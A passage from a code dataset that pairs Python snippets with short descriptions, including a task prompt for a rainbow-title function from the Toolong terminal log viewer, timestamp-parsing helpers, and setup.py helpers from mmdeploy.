env={**os.environ, "TEXTUAL_ALLOW_SIGNALS": "1"},
) as process:
# Current process copies from stdin to the temp file
selector = selectors.SelectSelector()
selector.register(sys.stdin.fileno(), selectors.EVENT_READ)
while process.poll() is None:
for _, event in selector.select(0.1):
if process.poll() is not None:
break
if event & selectors.EVENT_READ:
if line := os.read(sys.stdin.fileno(), 1024 * 64):
temp_file.write(line)
else:
break | View / tail / search log files. |
188,529 | import webbrowser
from importlib.metadata import version
from rich.text import Text
from textual import on
from textual.app import ComposeResult
from textual.containers import Center, VerticalScroll
from textual.screen import ModalScreen
from textual.widgets import Static, Markdown, Footer
TITLE = rf"""
_______ _
|__ __| | | Built with Textual
| | ___ ___ | | ___ _ __ __ _
| |/ _ \ / _ \| | / _ \| '_ \ / _` |
| | (_) | (_) | |___| (_) | | | | (_| |
|_|\___/ \___/|______\___/|_| |_|\__, |
__/ |
Moving at Terminal velocity |___/ v{version('toolong')}
"""
COLORS = [
"#881177",
"#aa3355",
"#cc6666",
"#ee9944",
"#eedd00",
"#99dd55",
"#44dd88",
"#22ccbb",
"#00bbcc",
"#0099cc",
"#3366bb",
"#663399",
]
The provided code snippet includes necessary dependencies for implementing the `get_title` function. Write a Python function `def get_title() -> Text` to solve the following problem:
Get the title, with a rainbow effect.
Here is the function:
def get_title() -> Text:
"""Get the title, with a rainbow effect."""
lines = TITLE.splitlines(keepends=True)
return Text.assemble(*zip(lines, COLORS)) | Get the title, with a rainbow effect. |
188,530 | from __future__ import annotations
from datetime import datetime
import re
from typing import Callable, NamedTuple
def parse(line: str) -> tuple[TimestampFormat | None, datetime | None]:
"""Attempt to parse a timestamp."""
for timestamp in TIMESTAMP_FORMATS:
regex, parse_callable = timestamp
match = re.search(regex, line)
if match is not None:
try:
return timestamp, parse_callable(match.string)
except ValueError:
continue
return None, None
def parse_timestamp(format: str) -> Callable[[str], datetime | None]:
def parse(timestamp: str) -> datetime | None:
try:
return datetime.strptime(timestamp, format)
except ValueError:
return None
return parse | null |
188,531 | import os
from pkg_resources import parse_version
from setuptools import find_packages, setup
pwd = os.path.dirname(__file__)
def readme():
with open(os.path.join(pwd, 'README.md'), encoding='utf-8') as f:
content = f.read()
return content | null |
188,532 | import os
from pkg_resources import parse_version
from setuptools import find_packages, setup
pwd = os.path.dirname(__file__)
version_file = 'mmdeploy/version.py'
def get_version():
with open(os.path.join(pwd, version_file), 'r') as f:
exec(compile(f.read(), version_file, 'exec'))
return locals()['__version__'] | null |